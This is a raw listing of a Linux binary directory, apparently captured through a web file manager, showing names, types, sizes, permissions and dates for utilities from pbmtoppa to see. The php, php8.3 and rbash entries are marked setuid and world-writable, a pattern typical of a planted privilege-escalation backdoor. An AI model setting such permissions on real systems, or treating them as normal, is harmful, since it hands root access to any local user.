14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoppa
application/x-pie-executable
30.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtopsg3
application/x-pie-executable
15.66 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoptx
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtowbmp
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtox10bm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoxbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtoybm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmtozinc
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbmupc
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pbput
text/x-shellscript
2.51 KB
-rwxr-xr-x
2019-08-03 05:35:53
pbputs
text/x-shellscript
2.51 KB
-rwxr-xr-x
2019-08-03 05:35:53
pcxtoppm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pdb3
text/x-script.python
61.74 KB
-rwxr-xr-x
2026-06-22 06:55:27
pdb3.10
text/x-script.python
61.74 KB
-rwxr-xr-x
2026-06-22 06:55:27
pdf2dsc
text/x-shellscript
698 B
-rwxr-xr-x
2025-09-25 04:42:27
pdf2ps
text/x-shellscript
909 B
-rwxr-xr-x
2025-09-25 04:42:27
peekfd
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2022-03-24 04:29:37
perl
application/x-pie-executable
3.63 MB
-rwxr-xr-x
2026-06-23 08:11:00
perl5.34-x86_64-linux-gnu
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-06-23 08:11:00
perl5.34.0
application/x-pie-executable
3.63 MB
-rwxr-xr-x
2026-06-23 08:11:00
perlbug
text/x-perl
44.12 KB
-rwxr-xr-x
2026-06-23 08:11:00
perldoc
text/x-shellscript
125 B
-rwxr-xr-x
2021-08-25 06:11:56
perlivp
text/x-perl
10.61 KB
-rwxr-xr-x
2026-06-23 08:11:00
perlthanks
text/x-perl
44.12 KB
-rwxr-xr-x
2026-06-23 08:11:00
perror
application/x-pie-executable
1.46 MB
-rwxr-xr-x
2026-06-20 11:54:34
pf2afm
text/x-shellscript
498 B
-rwxr-xr-x
2025-09-25 04:42:27
pfbtopfa
text/x-shellscript
516 B
-rwxr-xr-x
2025-09-25 04:42:27
pgmbentley
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmcrater
application/x-pie-executable
18.05 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmedge
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmenhance
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmhist
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmkernel
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmnoise
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmnorm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmoil
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmramp
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmslice
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmtexture
application/x-pie-executable
30.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmtofs
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmtolispm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmtopbm
application/x-pie-executable
20.45 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgmtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pgrep
application/x-pie-executable
30.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
phar
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar.default
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar.phar
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar.phar.default
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar.phar8.3
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 05:44:15
phar.phar8.4
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar8.3
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 05:44:15
phar8.3.phar
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 05:44:15
phar8.4
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
phar8.4.phar
application/octet-stream
14.88 KB
-rwxr-xr-x
2025-03-13 03:35:47
php
application/x-pie-executable
5.52 MB
-rwsrwxrwx
2025-03-13 05:44:15
php.default
application/x-pie-executable
5.74 MB
-rwxr-xr-x
2025-03-13 03:35:47
php8.3
application/x-pie-executable
5.52 MB
-rwsrwxrwx
2025-03-13 05:44:15
php8.4
application/x-pie-executable
5.74 MB
-rwxr-xr-x
2025-03-13 03:35:47
pi1toppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pi3topbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pic
application/x-pie-executable
200.04 KB
-rwxr-xr-x
2022-03-23 01:56:30
pico
application/x-pie-executable
276.52 KB
-rwxr-xr-x
2026-06-03 10:51:38
piconv
text/x-perl
8.16 KB
-rwxr-xr-x
2026-06-23 08:11:00
pidof
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2021-12-14 09:17:22
pidwait
application/x-pie-executable
30.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
pinentry
application/x-pie-executable
58.65 KB
-rwxr-xr-x
2022-03-24 04:31:21
pinentry-curses
application/x-pie-executable
58.65 KB
-rwxr-xr-x
2022-03-24 04:31:21
ping
application/x-pie-executable
74.88 KB
-rwxr-xr-x
2025-07-24 11:51:44
ping4
application/x-pie-executable
74.88 KB
-rwxr-xr-x
2025-07-24 11:51:44
ping6
application/x-pie-executable
74.88 KB
-rwxr-xr-x
2025-07-24 11:51:44
pinky
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
pjtoppm
application/x-pie-executable
18.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
pkaction
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2026-04-10 10:59:20
pkcheck
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-04-10 10:59:20
pkcon
application/x-pie-executable
58.3 KB
-rwxr-xr-x
2026-04-20 12:24:54
pkexec
application/x-pie-executable
30.15 KB
-rwsr-xr-x
2026-04-10 10:59:20
pkill
application/x-pie-executable
30.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
pkmon
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-04-20 12:24:54
pkttyagent
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2026-04-10 10:59:20
pl2pm
text/x-perl
4.43 KB
-rwxr-xr-x
2026-06-23 08:11:00
pldd
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-07-24 12:11:17
plymouth
application/x-pie-executable
46.3 KB
-rwxr-xr-x
2022-03-18 10:45:18
pmap
application/x-pie-executable
34.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
pngtopnm
application/x-pie-executable
26.11 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmalias
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmarith
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmcat
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmcolormap
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmcomp
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmconvol
application/x-pie-executable
42.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmcrop
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmcut
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmdepth
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmenlarge
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmfile
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmflip
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmgamma
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmhisteq
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmhistmap
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmindex
text/x-shellscript
4.49 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnminterp
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnminterp-gen
text/x-shellscript
1.31 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnminvert
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmmargin
text/x-shellscript
1.73 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmmontage
application/x-pie-executable
18.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmnlfilt
application/x-pie-executable
22.09 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmnoraw
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmnorm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmpad
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmpaste
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmpsnr
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmquant
text/x-perl
3.13 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmremap
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmrotate
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmscale
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmscalefixed
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmshear
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmsmooth
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmsplit
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtile
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtoddif
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtofiasco
application/x-pie-executable
208.05 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtofits
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtojpeg
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtopalm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtoplainpnm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtopng
application/x-pie-executable
38.09 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtops
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtorast
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtorle
application/x-pie-executable
42.3 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtosgi
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtosir
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtotiff
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtotiffcmyk
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pnmtoxwd
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pod2html
text/x-perl
4.04 KB
-rwxr-xr-x
2026-06-23 08:11:00
pod2man
text/x-perl
14.68 KB
-rwxr-xr-x
2026-06-23 08:11:00
pod2text
text/x-perl
10.55 KB
-rwxr-xr-x
2026-06-23 08:11:00
pod2usage
text/x-perl
4.01 KB
-rwxr-xr-x
2026-06-23 08:11:00
podchecker
text/x-perl
3.57 KB
-rwxr-xr-x
2026-06-23 08:11:00
pollinate
text/x-shellscript
8.54 KB
-rwxr-xr-x
2018-05-29 08:13:20
pphs
text/x-shellscript
404 B
-rwxr-xr-x
2025-09-25 04:42:27
ppm3d
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmbrighten
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmchange
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmcie
application/x-pie-executable
26.19 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmcolormask
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmcolors
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmdim
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmdist
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmdither
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmfade
text/x-perl
11.39 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmflash
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmforge
application/x-pie-executable
22.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmhist
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmlabel
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmmake
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmmix
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmnorm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmntsc
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmpat
application/x-pie-executable
26.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmquant
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmquantall
text/x-shellscript
2.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmqvga
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmrainbow
text/x-perl
1.67 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmrelief
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmshadow
text/x-perl
6.67 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmshift
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmspread
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoacad
application/x-pie-executable
18.88 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtobmp
application/x-pie-executable
18.07 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoeyuv
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtogif
application/x-pie-executable
22.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoicr
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoilbm
application/x-pie-executable
46.11 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtojpeg
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoleaf
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtolj
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtomap
text/x-shellscript
81 B
-rwxr-xr-x
2021-02-07 06:32:35
ppmtomitsu
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtompeg
application/x-pie-executable
541.94 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoneo
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopcx
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopgm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopi1
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopict
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopj
application/x-pie-executable
14.09 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtopuzz
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtorgb3
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtosixel
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtotga
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtouil
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtowinicon
application/x-pie-executable
18.05 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoxpm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoyuv
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtoyuvsplit
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ppmtv
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pr
application/x-pie-executable
66.58 KB
-rwxr-xr-x
2026-01-23 10:51:17
preconv
application/x-pie-executable
54.48 KB
-rwxr-xr-x
2022-03-23 01:56:30
print
text/x-perl
18.06 KB
-rwxr-xr-x
2026-07-03 01:05:05
printafm
text/x-shellscript
395 B
-rwxr-xr-x
2025-09-25 04:42:27
printenv
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-01-23 10:51:17
printf
application/x-pie-executable
50.44 KB
-rwxr-xr-x
2026-01-23 10:51:17
prlimit
application/x-pie-executable
26.89 KB
-rwxr-xr-x
2026-03-06 04:10:04
pro
text/x-script.python
1003 B
-rwxr-xr-x
2026-07-06 01:36:19
prove
text/x-perl
13.34 KB
-rwxr-xr-x
2026-06-23 08:11:00
prtstat
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2022-03-24 04:29:37
ps
application/x-pie-executable
138.45 KB
-rwxr-xr-x
2023-10-31 11:36:04
ps2ascii
text/x-shellscript
631 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2epsi
text/x-shellscript
1.23 KB
-rwxr-xr-x
2025-09-25 04:42:27
ps2pdf
text/x-shellscript
272 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2pdf12
text/x-shellscript
215 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2pdf13
text/x-shellscript
215 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2pdf14
text/x-shellscript
215 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2pdfwr
text/x-shellscript
1.05 KB
-rwxr-xr-x
2025-09-25 04:42:27
ps2ps
text/x-shellscript
647 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2ps2
text/x-shellscript
669 B
-rwxr-xr-x
2025-09-25 04:42:27
ps2txt
text/x-shellscript
631 B
-rwxr-xr-x
2025-09-25 04:42:27
psfaddtable
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
psfgettable
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
psfstriptable
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
psfxtable
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
psidtopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pslog
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2022-03-24 04:29:37
pstopnm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
pstree
application/x-pie-executable
35.32 KB
-rwxr-xr-x
2022-03-24 04:29:37
pstree.x11
application/x-pie-executable
35.32 KB
-rwxr-xr-x
2022-03-24 04:29:37
ptar
text/x-perl
3.48 KB
-rwxr-xr-x
2026-06-23 08:11:00
ptardiff
text/x-perl
2.58 KB
-rwxr-xr-x
2026-06-23 08:11:00
ptargrep
text/x-perl
4.29 KB
-rwxr-xr-x
2026-06-23 08:11:00
ptx
application/x-pie-executable
126.55 KB
-rwxr-xr-x
2026-01-23 10:51:17
purge-old-kernels
text/x-shellscript
1.12 KB
-rwxr-xr-x
2020-02-17 02:11:50
pwd
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
pwdx
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
py3clean
text/x-script.python
7.63 KB
-rwxr-xr-x
2024-08-08 12:28:21
py3compile
text/x-script.python
12.88 KB
-rwxr-xr-x
2024-08-08 12:28:21
py3versions
text/x-script.python
11.63 KB
-rwxr-xr-x
2024-08-08 12:28:21
pybabel
text/x-script.python
953 B
-rwxr-xr-x
2021-05-01 03:13:14
pybabel-python3
text/x-script.python
953 B
-rwxr-xr-x
2021-05-01 03:13:14
pydoc3
text/x-script.python
79 B
-rwxr-xr-x
2026-06-22 06:55:27
pydoc3.10
text/x-script.python
79 B
-rwxr-xr-x
2026-06-22 06:55:27
pygettext3
text/x-script.python
23.67 KB
-rwxr-xr-x
2023-06-06 10:30:33
pygettext3.10
text/x-script.python
23.67 KB
-rwxr-xr-x
2023-06-06 10:30:33
pyhtmlizer3
text/x-script.python
968 B
-rwxr-xr-x
2026-05-22 03:02:45
pyserial-miniterm
text/x-script.python
975 B
-rwxr-xr-x
2022-04-03 09:33:57
pyserial-ports
text/x-script.python
969 B
-rwxr-xr-x
2022-04-03 09:33:57
python3
application/x-pie-executable
5.64 MB
-rwxr-xr-x
2026-06-22 06:55:27
python3.10
application/x-pie-executable
5.64 MB
-rwxr-xr-x
2026-06-22 06:55:27
pzstd
application/x-pie-executable
702.47 KB
-rwxr-xr-x
2022-03-24 04:15:58
qrencode
application/x-pie-executable
38.25 KB
-rwxr-xr-x
2020-12-22 05:31:03
qrttoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
quirks-handler
text/x-script.python
2.4 KB
-rwxr-xr-x
2025-12-10 09:16:48
ranlib
application/x-pie-executable
54.48 KB
-rwxr-xr-x
2025-12-03 03:08:01
rasttopnm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
rawtopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
rawtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
rbash
application/x-pie-executable
1.33 MB
-rwsrwxrwx
2024-03-14 11:31:47
rcp
application/x-pie-executable
130.59 KB
-rwxr-xr-x
2026-07-09 06:38:00
rdma
application/x-pie-executable
98.52 KB
-rwxr-xr-x
2026-04-15 07:15:26
readelf
application/x-pie-executable
758.44 KB
-rwxr-xr-x
2025-12-03 03:08:01
readlink
application/x-pie-executable
38.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
realpath
application/x-pie-executable
38.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
red
text/x-shellscript
89 B
-rwxr-xr-x
2022-02-13 11:08:51
renice
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
rescan-scsi-bus.sh
text/x-shellscript
38.05 KB
-rwxr-xr-x
2023-03-22 02:57:45
reset
application/x-pie-executable
26.31 KB
-rwxr-xr-x
2026-06-30 09:25:30
resizecons
application/x-pie-executable
26.32 KB
-rwxr-xr-x
2022-12-16 02:14:33
resizepart
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
resolvectl
application/x-pie-executable
130.52 KB
-rwxr-xr-x
2026-06-05 03:40:28
rev
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
rgb3toppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
rgrep
text/x-shellscript
30 B
-rwxr-xr-x
2020-01-29 12:09:17
rletopnm
application/x-pie-executable
42.27 KB
-rwxr-xr-x
2021-02-07 06:32:35
rlogin
application/x-pie-executable
827.04 KB
-rwxr-xr-x
2026-07-09 06:38:00
rm
application/x-pie-executable
58.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
rmdir
application/x-pie-executable
42.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
rnano
application/x-pie-executable
276.52 KB
-rwxr-xr-x
2026-06-03 10:51:38
rotatelogs
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-07-06 04:41:46
routef
text/x-shellscript
208 B
-rwxr-xr-x
2026-04-15 07:15:26
routel
text/x-shellscript
1.62 KB
-rwxr-xr-x
2026-04-15 07:15:26
rpcgen
application/x-pie-executable
94.59 KB
-rwxr-xr-x
2022-03-25 09:57:34
rrsync
text/x-script.python
12.34 KB
-rwxr-xr-x
2026-06-08 02:10:43
rsh
application/x-pie-executable
827.04 KB
-rwxr-xr-x
2026-07-09 06:38:00
rsync
application/x-pie-executable
522.09 KB
-rwxr-xr-x
2026-06-08 02:10:43
rsync-ssl
text/x-shellscript
5.02 KB
-rwxr-xr-x
2026-06-08 02:10:43
rtstat
application/x-pie-executable
22.66 KB
-rwxr-xr-x
2026-04-15 07:15:26
run-mailcap
text/x-perl
18.06 KB
-rwxr-xr-x
2026-07-03 01:05:05
run-one
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
run-one-constantly
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
run-one-until-failure
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
run-one-until-success
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
run-parts
application/x-pie-executable
26.54 KB
-rwxr-xr-x
2022-03-23 01:49:54
run-this-one
text/x-shellscript
3.51 KB
-rwxr-xr-x
2014-01-15 10:24:04
runcon
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
rview
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
rvim
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
savelog
text/x-shellscript
10.24 KB
-rwxr-xr-x
2022-03-23 01:49:54
sbattach
application/x-pie-executable
26.54 KB
-rwxr-xr-x
2021-11-05 05:32:24
sbigtopgm
application/x-pie-executable
14.12 KB
-rwxr-xr-x
2021-02-07 06:32:35
sbkeysync
application/x-pie-executable
34.74 KB
-rwxr-xr-x
2021-11-05 05:32:24
sbsiglist
application/x-pie-executable
14.6 KB
-rwxr-xr-x
2021-11-05 05:32:24
sbsign
application/x-pie-executable
34.7 KB
-rwxr-xr-x
2021-11-05 05:32:24
sbvarsign
application/x-pie-executable
22.73 KB
-rwxr-xr-x
2021-11-05 05:32:24
sbverify
application/x-pie-executable
34.61 KB
-rwxr-xr-x
2021-11-05 05:32:24
scandeps
text/x-perl
6.45 KB
-rwxr-xr-x
2024-11-18 05:31:20
scp
application/x-pie-executable
130.59 KB
-rwxr-xr-x
2026-07-09 06:38:00
screen
application/x-pie-executable
466.24 KB
-rwxr-xr-x
2026-01-22 08:14:32
screendump
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-12-16 02:14:33
script
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
scriptlive
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
scriptreplay
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
scsi_logging_level
text/x-shellscript
8.38 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_mandat
text/x-shellscript
3.52 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_readcap
text/x-shellscript
1.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_ready
text/x-shellscript
1.09 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_satl
text/x-shellscript
3.74 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_start
text/x-shellscript
1.25 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_stop
text/x-shellscript
1.44 KB
-rwxr-xr-x
2023-03-22 02:57:45
scsi_temperature
text/x-shellscript
936 B
-rwxr-xr-x
2023-03-22 02:57:45
sdiff
application/x-pie-executable
46.39 KB
-rwxr-xr-x
2022-03-23 01:50:34
sed
application/x-pie-executable
110.57 KB
-rwxr-xr-x
2026-04-17 06:02:54
see
text/x-perl
18.06 KB
